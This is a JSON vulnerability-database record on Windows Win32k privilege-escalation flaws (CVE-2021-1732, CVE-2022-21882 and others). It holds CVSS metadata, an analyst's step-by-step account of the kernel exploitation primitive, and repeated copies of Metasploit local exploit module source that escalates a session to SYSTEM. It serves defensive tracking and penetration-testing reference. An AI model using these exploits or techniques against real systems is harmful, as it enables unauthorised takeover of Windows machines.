{"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-08T00:00:00", "type": "attackerkb", "title": "CVE-2022-21882", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1732", "CVE-2022-21882", "CVE-2022-21887"], "modified": "2022-02-08T00:00:00", "id": "AKB:9E1E5A73-8C4D-4A6A-96A5-14A9041AA2CB", "href": "https://attackerkb.com/topics/KBiVbKrlyU/cve-2022-21882", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-14T23:28:05", "description": "Win32k Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2022-21882.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-08T00:00:00", "type": "attackerkb", "title": "CVE-2022-21887", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-21882", "CVE-2022-21887"], "modified": "2022-02-08T00:00:00", "id": "AKB:31AEBF63-78A2-4DBE-A691-982C63A64DD0", "href": "https://attackerkb.com/topics/7thCFbEYwd/cve-2022-21887", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-09-25T20:07:54", "description": "Windows Win32k Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1698.\n\n \n**Recent assessments:** \n \n**gwillcox-r7** at February 10, 2021 10:03pm UTC reported:\n\nA very interesting vulnerability in win32kfull.sys on Windows 10 devices up to and including 20H2. Although the exploit in the wild specifically targeted Windows 10 v1709 to Windows 10 v1909, as noted at <https://ti.dbappsecurity.com.cn/blog/index.php/2021/02/10/windows-kernel-zero-day-exploit-is-used-by-bitter-apt-in-targeted-attack/>, the researchers noted that the vulnerability could be modified to work on Windows 20H2 with minor modifications.\n\nFrom my perspective this is rather significant, particularly given this is a win32kfull.sys bug we are talking about here. Most of the primitives that made win32k exploitation easier were entirely wiped out by Microsoft which prompted a lot of researchers who previously spoke publicly about such primitives in conference talks and similar to go quiet. Whilst rumor has been that there were other primitives one could use for exploitation, they were considered closely guarded secrets due to the difficulty in finding them and the fact that Microsoft would be likely to patch them very quickly.\n\nThe new primitive that is used here appears to be setting tagMenuBarInfo.rcBar.left and tagMenuBarInfo.rcBar.top and then calling GetMenuBarInfo(), which allows one to perform an arbitrary read in kernel memory. This has not been discussed before but is similar to another concepted discussed in the paper \u201cLPE vulnerabilities exploitation on Windows 10 Anniversary Update\u201d at ZeroNights which mentioned using two adjacent Windows and then setting the cbwndExtra field of the first window to a large value to allow the first window to set all of the properties of the second window. By chaining this together the attacker could achieve an arbitrary read and write in kernel memory.\n\nThe bug itself stems from a xxxClientAllocWindowClassExtraBytes() callback within win32kfull!xxxCreateWindowEx. Specifically when xxxCreateWindowEx() creates a window object with a cbwndExtra field set, aka it has extra Window bytes, it will perform a xxxClientAllocWindowClassExtraBytes() callback to usermode to allocate the extra bytes for the Window.\n\nYou may be wondering why such callbacks are needed. Well a long time ago Windows used to handle all its graphics stuff in kernel mode, but then people realized that was too slow given increasing demands for speed, so they made most of the code operate in usermode with key stuff handled by kernel mode. This lead to a big rift and is the reason we have callbacks. Thats the nutshell version anyway but go read up on <http://mista.nu/research/mandt-win32k-slides.pdf> and <https://media.blackhat.com/bh-us-11/Mandt/BH_US_11_Mandt_win32k_WP.pdf> if you want to learn more. Its a fascinating read :)\n\nAnyway back on topic. Since xxxClientAllocWindowClassExtraBytes() is a callback that is under the attackers controller, the attacker can set a hook that will trigger when a xxxClientAllocWindowClassExtraBytes() callback is made and call NtUserConsoleControl() with the handle of the window that is currently being operated on. This will end up calling xxxConsoleControl() in kernel mode which will set *((tagWND+0x28)+0x128) to an offset, and will AND the flag at *((tagWND+0x28) + 0xE8) with 0x800 to indicate that the value of the WndExtra member is an offset from the base address of RtlHeapBase. Unfortunately, whatever value is returned by the hooked xxxClientAllocWindowClassExtraBytes() callback (aka whatever value the attacker chooses) will be used as the value of WndExtra, since remember we are meant to be allocating the address of this field at the time due to the earlier xxxCreateWindowEx() call needing to allocate memory for WndExtra.\n\nOnce this is done, the callback will be completed, execution will return to usermode, and a call to DestroyWindow() will be made from usermode. This will cause xxxDestroyWindow() to be called in kernel mode which will call xxxFreeWindow(), which will check if *((tagWND+0x28) + 0xE8) has the flag designated by 0x800 set, which it will due to the alterations made by xxxConsoleControl(). This will then result in a call to RtlFreeHeap() which will attempt to free an address designated by RtlHeapBase + offset, where offset is the value of WndExtra (which is taken from the xxxClientAllocWindowClassExtraBytes() callback and therefore completely controlled by the attacker).\n\nThis subsequently results in the attacker being able to free memory at an arbitrary address in memory.\n\nI\u2019ll not dive into a full detailed analysis of the rest of the exploitation steps as the article at <https://ti.dbappsecurity.com.cn/blog/index.php/2021/02/10/windows-kernel-zero-day-exploit-is-used-by-bitter-apt-in-targeted-attack/> is very comprehensive but I will say from what I\u2019ve read there, there is enough detail that people of a decent skill level could probably recreate this exploit. It certainly isn\u2019t an easy exploit to recreate but the exploit goes into a lot of detail about the various mitigation bypasses that were used to make this exploit possible, which could help an attacker more readily recreate this bug.\n\nAgain, this exploit was exploited in the wild so it is possible for this bug to be recreated, it just might take some time for people to work out a few of the specifics needed to get a working exploit. If you are running Windows 10, it is highly advised to upgrade as soon as possible: everything I am reading here points to signs that this will be weaponized within the coming few weeks or months.\n\nAdditionally it should be noted that this exploit was noted to be capable of escaping Microsoft IE\u2019s sandbox (but not Google Chrome\u2019s) so if you are running Microsoft IE within your environment, its even more imperative that you patch this issue to prevent an attacker from combining this with an IE 0day and conducting a drive by attack against your organization, whereby simply browsing a website could lead to attackers gaining SYSTEM level privileges against affected systems.\n\nAssessed Attacker Value: 4 \nAssessed Attacker Value: 4Assessed Attacker Value: 3\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-02-25T00:00:00", "type": "attackerkb", "title": "CVE-2021-1732", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1698", "CVE-2021-1732"], "modified": "2021-03-04T00:00:00", "id": "AKB:DFA2540D-E431-4CDE-B67A-7EA3F2B87A74", "href": "https://attackerkb.com/topics/7eGGM4Xknz/cve-2021-1732", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-20T20:10:05", "description": "Win32k Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-27072.\n\n \n**Recent assessments:** \n \n**ccondon-r7** at April 13, 2021 8:41pm UTC reported:\n\nAh, another day, another Win32k privilege escalation used in the wild. [Securelist has a good write-up](<https://securelist.com/zero-day-vulnerability-in-desktop-window-manager-cve-2021-28310-used-in-the-wild/101898/>) on this bug, which they discovered because it was used in a BITTER APT zero-day attack in (it sounds like) conjunction with [CVE-2021-1732](<https://attackerkb.com/assessments/1a332300-7ded-419b-b717-9bf03ca2a14e>) (there\u2019s a Metasploit module for the second vuln).\n\nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "edition": 2, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-04-13T00:00:00", "type": "attackerkb", "title": "CVE-2021-28310", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1732", "CVE-2021-27072", "CVE-2021-28310"], "modified": "2021-04-17T00:00:00", "id": "AKB:007C4393-6621-4656-8BFD-D0CFE64DCD65", "href": "https://attackerkb.com/topics/pKKVzHnVRA/cve-2021-28310", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2022-02-28T16:54:53", "description": "", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2022-02-28T00:00:00", "type": "packetstorm", "title": "Win32k ConsoleControl Offset Confusion / Privilege Escalation", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-7255", "CVE-2021-1732", "CVE-2022-21882"], "modified": "2022-02-28T00:00:00", "id": "PACKETSTORM:166169", "href": "https://packetstormsecurity.com/files/166169/Win32k-ConsoleControl-Offset-Confusion-Privilege-Escalation.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Local \nRank = AverageRanking \n \ninclude Msf::Post::File \ninclude Msf::Post::Windows::Priv \ninclude Msf::Post::Windows::Process \ninclude Msf::Post::Windows::ReflectiveDLLInjection \nprepend Msf::Exploit::Remote::AutoCheck \n \ninclude Msf::Exploit::Deprecated \nmoved_from 'exploit/windows/local/cve_2021_1732_win32k' \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n{ \n'Name' => 'Win32k ConsoleControl Offset Confusion', \n'Description' => %q{ \nA vulnerability exists within win32k that can be leveraged by an attacker to escalate privileges to those of \nNT AUTHORITY\\SYSTEM. The flaw exists in how the WndExtra field of a window can be manipulated into being \ntreated as an offset despite being populated by an attacker-controlled value. This can be leveraged to \nachieve an out of bounds write operation, eventually leading to privilege escalation. \n \nThis flaw was originally identified as CVE-2021-1732 and was patched by Microsoft on February 9th, 2021. \nIn early 2022, a technique to bypass the patch was identified and assigned CVE-2022-21882. The root cause is \nis the same for both vulnerabilities. This exploit combines the patch bypass with the original exploit to \nfunction on a wider range of Windows 10 targets. \n}, \n'License' => MSF_LICENSE, \n'Author' => [ \n# CVE-2021-1732 \n'BITTER APT', # exploit as used in the wild \n'JinQuan', # detailed analysis \n'MaDongZe', # detailed analysis \n'TuXiaoYi', # detailed analysis \n'LiHao', # detailed analysis \n# CVE-2022-21882 \n'L4ys', # github poc \n# both CVEs \n'KaLendsi', # github pocs \n# Metasploit exploit \n'Spencer McIntyre' # metasploit module \n], \n'Arch' => [ ARCH_X64 ], \n'Platform' => 'win', \n'SessionTypes' => [ 'meterpreter' ], \n'DefaultOptions' => { \n'EXITFUNC' => 'thread' \n}, \n'Targets' => [ \n[ 'Windows 10 v1803-21H2 x64', { 'Arch' => ARCH_X64 } ] \n], \n'Payload' => { \n'DisableNops' => true \n}, \n'References' => [ \n# CVE-2021-1732 references \n[ 'CVE', '2021-1732' ], \n[ 'URL', 'https://ti.dbappsecurity.com.cn/blog/index.php/2021/02/10/windows-kernel-zero-day-exploit-is-used-by-bitter-apt-in-targeted-attack/' ], \n[ 'URL', 'https://github.com/KaLendsi/CVE-2021-1732-Exploit' ], \n[ 'URL', 'https://attackerkb.com/assessments/1a332300-7ded-419b-b717-9bf03ca2a14e' ], \n[ 'URL', 'https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1732' ], \n# the rest are not cve-2021-1732 specific but are on topic regarding the techniques used within the exploit \n[ 'URL', 'https://www.fuzzysecurity.com/tutorials/expDev/22.html' ], \n[ 'URL', 'https://www.geoffchappell.com/studies/windows/win32/user32/structs/wnd/index.htm' ], \n[ 'URL', 'https://byteraptors.github.io/windows/exploitation/2020/06/03/exploitingcve2019-1458.html' ], \n[ 'URL', 'https://www.trendmicro.com/en_us/research/16/l/one-bit-rule-system-analyzing-cve-2016-7255-exploit-wild.html' ], \n# CVE-2022-21882 references \n[ 'CVE', '2022-21882' ], \n[ 'URL', 'https://github.com/L4ys/CVE-2022-21882' ], \n[ 'URL', 'https://github.com/KaLendsi/CVE-2022-21882' ] \n], \n'DisclosureDate' => '2021-02-09', # CVE-2021-1732 disclosure date \n'DefaultTarget' => 0, \n'Notes' => { \n'Stability' => [ CRASH_OS_RESTARTS, ], \n'Reliability' => [ REPEATABLE_SESSION, ], \n'SideEffects' => [] \n} \n} \n) \n) \nend \n \ndef check \nsysinfo_value = sysinfo['OS'] \n \nif sysinfo_value !~ /windows/i \n# Non-Windows systems are definitely not affected. \nreturn Exploit::CheckCode::Safe \nend \n \nbuild_num = sysinfo_value.match(/\\w+\\d+\\w+(\\d+)/)[0].to_i \nvprint_status(\"Windows Build Number = #{build_num}\") \n \nunless sysinfo_value =~ /10/ && (build_num >= 17134 && build_num <= 19044) \nprint_error('The exploit only supports Windows 10 versions 1803 - 21H2') \nreturn CheckCode::Safe \nend \n \nCheckCode::Appears \nend \n \ndef exploit \nif is_system? \nfail_with(Failure::None, 'Session is already elevated') \nend \n \nif sysinfo['Architecture'] == ARCH_X64 && session.arch == ARCH_X86 \nfail_with(Failure::NoTarget, 'Running against WOW64 is not supported') \nelsif sysinfo['Architecture'] == ARCH_X64 && target.arch.first == ARCH_X86 \nfail_with(Failure::NoTarget, 'Session host is x64, but the target is specified as x86') \nelsif sysinfo['Architecture'] == ARCH_X86 && target.arch.first == ARCH_X64 \nfail_with(Failure::NoTarget, 'Session host is x86, but the target is specified as x64') \nend \n \nencoded_payload = payload.encoded \nexecute_dll( \n::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2022-21882', 'CVE-2022-21882.x64.dll'), \n[encoded_payload.length].pack('I<') + encoded_payload \n) \n \nprint_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.') \nend \nend \n`\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://packetstormsecurity.com/files/download/166169/cve_2022_21882_win32k.rb.txt"}, {"lastseen": "2021-03-19T17:08:44", "description": "", "cvss3": {}, "published": "2021-03-19T00:00:00", "type": "packetstorm", "title": "Win32k ConsoleControl Offset Confusion", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2016-7255", "CVE-2021-1732"], "modified": "2021-03-19T00:00:00", "id": "PACKETSTORM:161880", "href": "https://packetstormsecurity.com/files/161880/Win32k-ConsoleControl-Offset-Confusion.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Local \nRank = GoodRanking \n \ninclude Msf::Post::File \ninclude Msf::Post::Windows::Priv \ninclude Msf::Post::Windows::Process \ninclude Msf::Post::Windows::ReflectiveDLLInjection \nprepend Msf::Exploit::Remote::AutoCheck \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n{ \n'Name' => 'Win32k ConsoleControl Offset Confusion', \n'Description' => %q{ \nA vulnerability exists within win32k that can be leveraged by an attacker to escalate privileges to those of \nNT AUTHORITY\\SYSTEM. The flaw exists in how the WndExtra field of a window can be manipulated into being \ntreated as an offset despite being populated by an attacker-controlled value. This can be leveraged to \nachieve an out of bounds write operation, eventually leading to privilege escalation. \n}, \n'License' => MSF_LICENSE, \n'Author' => [ \n'BITTER APT', # exploit as used in the wild \n'JinQuan', # detailed analysis \n'MaDongZe', # detailed analysis \n'TuXiaoYi', # detailed analysis \n'LiHao', # detailed analysis \n'KaLendsi', # github poc targeting v1909 \n'Spencer McIntyre' # metasploit module \n], \n'Arch' => [ ARCH_X64 ], \n'Platform' => 'win', \n'SessionTypes' => [ 'meterpreter' ], \n'DefaultOptions' => \n{ \n'EXITFUNC' => 'thread' \n}, \n'Targets' => \n[ \n[ 'Windows 10 v1803-20H2 x64', { 'Arch' => ARCH_X64 } ] \n], \n'Payload' => \n{ \n'DisableNops' => true \n}, \n'References' => \n[ \n[ 'CVE', '2021-1732' ], \n[ 'URL', 'https://ti.dbappsecurity.com.cn/blog/index.php/2021/02/10/windows-kernel-zero-day-exploit-is-used-by-bitter-apt-in-targeted-attack/' ], \n[ 'URL', 'https://github.com/KaLendsi/CVE-2021-1732-Exploit' ], \n[ 'URL', 'https://attackerkb.com/assessments/1a332300-7ded-419b-b717-9bf03ca2a14e' ], \n[ 'URL', 'https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1732' ], \n# the rest are not cve-2021-1732 specific but are on topic regarding the techniques used within the exploit \n[ 'URL', 'https://www.fuzzysecurity.com/tutorials/expDev/22.html' ], \n[ 'URL', 'https://www.geoffchappell.com/studies/windows/win32/user32/structs/wnd/index.htm' ], \n[ 'URL', 'https://byteraptors.github.io/windows/exploitation/2020/06/03/exploitingcve2019-1458.html' ], \n[ 'URL', 'https://www.trendmicro.com/en_us/research/16/l/one-bit-rule-system-analyzing-cve-2016-7255-exploit-wild.html' ] \n], \n'DisclosureDate' => '2021-02-10', \n'DefaultTarget' => 0, \n'Notes' => \n{ \n'Stability' => [ CRASH_OS_RESTARTS, ], \n'Reliability' => [ REPEATABLE_SESSION, ] \n} \n} \n) \n) \nend \n \ndef check \nsysinfo_value = sysinfo['OS'] \n \nif sysinfo_value !~ /windows/i \n# Non-Windows systems are definitely not affected. \nreturn Exploit::CheckCode::Safe \nend \n \nbuild_num = sysinfo_value.match(/\\w+\\d+\\w+(\\d+)/)[0].to_i \nvprint_status(\"Windows Build Number = #{build_num}\") \n# see https://docs.microsoft.com/en-us/windows/release-information/ \nunless sysinfo_value =~ /10/ && (build_num >= 17134 && build_num <= 19042) \nprint_error('The exploit only supports Windows 10 versions 1803 - 20H2') \nreturn CheckCode::Safe \nend \n \nCheckCode::Appears \nend \n \ndef exploit \nif is_system? \nfail_with(Failure::None, 'Session is already elevated') \nend \n \nif sysinfo['Architecture'] == ARCH_X64 && session.arch == ARCH_X86 \nfail_with(Failure::NoTarget, 'Running against WOW64 is not supported') \nelsif sysinfo['Architecture'] == ARCH_X64 && target.arch.first == ARCH_X86 \nfail_with(Failure::NoTarget, 'Session host is x64, but the target is specified as x86') \nelsif sysinfo['Architecture'] == ARCH_X86 && target.arch.first == ARCH_X64 \nfail_with(Failure::NoTarget, 'Session host is x86, but the target is specified as x64') \nend \n \nencoded_payload = payload.encoded \nexecute_dll( \n::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2021-1732', 'CVE-2021-1732.x64.dll'), \n[encoded_payload.length].pack('I<') + encoded_payload \n) \n \nprint_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.') \nend \nend \n`\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://packetstormsecurity.com/files/download/161880/cve_2021_1732_win32k.rb.txt"}], "zdt": [{"lastseen": "2022-06-06T22:06:24", "description": "A vulnerability exists within win32k that can be leveraged by an attacker to escalate privileges to those of NT AUTHORITY\\SYSTEM. The flaw exists in how the WndExtra field of a window can be manipulated into being treated as an offset despite being populated by an attacker-controlled value. This can be leveraged to achieve an out of bounds write operation, eventually leading to privilege escalation. This flaw was originally identified as CVE-2021-1732 and was patched by Microsoft on February 9th, 2021. In early 2022, a technique to bypass the patch was identified and assigned CVE-2022-21882. The root cause is is the same for both vulnerabilities. This exploit combines the patch bypass with the original exploit to function on a wider range of Windows 10 targets.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-28T00:00:00", "type": "zdt", "title": "Win32k ConsoleControl Offset Confusion / Privilege Escalation Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-7255", "CVE-2021-1732", "CVE-2022-21882"], "modified": "2022-02-28T00:00:00", "id": "1337DAY-ID-37433", "href": "https://0day.today/exploit/description/37433", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = AverageRanking\n\n include Msf::Post::File\n include Msf::Post::Windows::Priv\n include Msf::Post::Windows::Process\n include Msf::Post::Windows::ReflectiveDLLInjection\n prepend Msf::Exploit::Remote::AutoCheck\n\n include Msf::Exploit::Deprecated\n moved_from 'exploit/windows/local/cve_2021_1732_win32k'\n\n def initialize(info = {})\n super(\n update_info(\n info,\n {\n 'Name' => 'Win32k ConsoleControl Offset Confusion',\n 'Description' => %q{\n A vulnerability exists within win32k that can be leveraged by an attacker to escalate privileges to those of\n NT AUTHORITY\\SYSTEM. The flaw exists in how the WndExtra field of a window can be manipulated into being\n treated as an offset despite being populated by an attacker-controlled value. This can be leveraged to\n achieve an out of bounds write operation, eventually leading to privilege escalation.\n\n This flaw was originally identified as CVE-2021-1732 and was patched by Microsoft on February 9th, 2021.\n In early 2022, a technique to bypass the patch was identified and assigned CVE-2022-21882. The root cause is\n is the same for both vulnerabilities. This exploit combines the patch bypass with the original exploit to\n function on a wider range of Windows 10 targets.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [\n # CVE-2021-1732\n 'BITTER APT', # exploit as used in the wild\n 'JinQuan', # detailed analysis\n 'MaDongZe', # detailed analysis\n 'TuXiaoYi', # detailed analysis\n 'LiHao', # detailed analysis\n # CVE-2022-21882\n 'L4ys', # github poc\n # both CVEs\n 'KaLendsi', # github pocs\n # Metasploit exploit\n 'Spencer McIntyre' # metasploit module\n ],\n 'Arch' => [ ARCH_X64 ],\n 'Platform' => 'win',\n 'SessionTypes' => [ 'meterpreter' ],\n 'DefaultOptions' => {\n 'EXITFUNC' => 'thread'\n },\n 'Targets' => [\n [ 'Windows 10 v1803-21H2 x64', { 'Arch' => ARCH_X64 } ]\n ],\n 'Payload' => {\n 'DisableNops' => true\n },\n 'References' => [\n # CVE-2021-1732 references\n [ 'CVE', '2021-1732' ],\n [ 'URL', 'https://ti.dbappsecurity.com.cn/blog/index.php/2021/02/10/windows-kernel-zero-day-exploit-is-used-by-bitter-apt-in-targeted-attack/' ],\n [ 'URL', 'https://github.com/KaLendsi/CVE-2021-1732-Exploit' ],\n [ 'URL', 'https://attackerkb.com/assessments/1a332300-7ded-419b-b717-9bf03ca2a14e' ],\n [ 'URL', 'https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1732' ],\n # the rest are not cve-2021-1732 specific but are on topic regarding the techniques used within the exploit\n [ 'URL', 'https://www.fuzzysecurity.com/tutorials/expDev/22.html' ],\n [ 'URL', 'https://www.geoffchappell.com/studies/windows/win32/user32/structs/wnd/index.htm' ],\n [ 'URL', 'https://byteraptors.github.io/windows/exploitation/2020/06/03/exploitingcve2019-1458.html' ],\n [ 'URL', 'https://www.trendmicro.com/en_us/research/16/l/one-bit-rule-system-analyzing-cve-2016-7255-exploit-wild.html' ],\n # CVE-2022-21882 references\n [ 'CVE', '2022-21882' ],\n [ 'URL', 'https://github.com/L4ys/CVE-2022-21882' ],\n [ 'URL', 'https://github.com/KaLendsi/CVE-2022-21882' ]\n ],\n 'DisclosureDate' => '2021-02-09', # CVE-2021-1732 disclosure date\n 'DefaultTarget' => 0,\n 'Notes' => {\n 'Stability' => [ CRASH_OS_RESTARTS, ],\n 'Reliability' => [ REPEATABLE_SESSION, ],\n 'SideEffects' => []\n }\n }\n )\n )\n end\n\n def check\n sysinfo_value = sysinfo['OS']\n\n if sysinfo_value !~ /windows/i\n # Non-Windows systems are definitely not affected.\n return Exploit::CheckCode::Safe\n end\n\n build_num = sysinfo_value.match(/\\w+\\d+\\w+(\\d+)/)[0].to_i\n vprint_status(\"Windows Build Number = #{build_num}\")\n\n unless sysinfo_value =~ /10/ && (build_num >= 17134 && build_num <= 19044)\n print_error('The exploit only supports Windows 10 versions 1803 - 21H2')\n return CheckCode::Safe\n end\n\n CheckCode::Appears\n end\n\n def exploit\n if is_system?\n fail_with(Failure::None, 'Session is already elevated')\n end\n\n if sysinfo['Architecture'] == ARCH_X64 && session.arch == ARCH_X86\n fail_with(Failure::NoTarget, 'Running against WOW64 is not supported')\n elsif sysinfo['Architecture'] == ARCH_X64 && target.arch.first == ARCH_X86\n fail_with(Failure::NoTarget, 'Session host is x64, but the target is specified as x86')\n elsif sysinfo['Architecture'] == ARCH_X86 && target.arch.first == ARCH_X64\n fail_with(Failure::NoTarget, 'Session host is x86, but the target is specified as x64')\n end\n\n encoded_payload = payload.encoded\n execute_dll(\n ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2022-21882', 'CVE-2022-21882.x64.dll'),\n [encoded_payload.length].pack('I<') + encoded_payload\n )\n\n print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.')\n end\nend\n", "sourceHref": "https://0day.today/exploit/37433", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "cisa_kev": [{"lastseen": "2022-08-10T17:26:47", "description": "Microsoft Win32k contains an unspecified vulnerability which allows for privilege escalation.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": 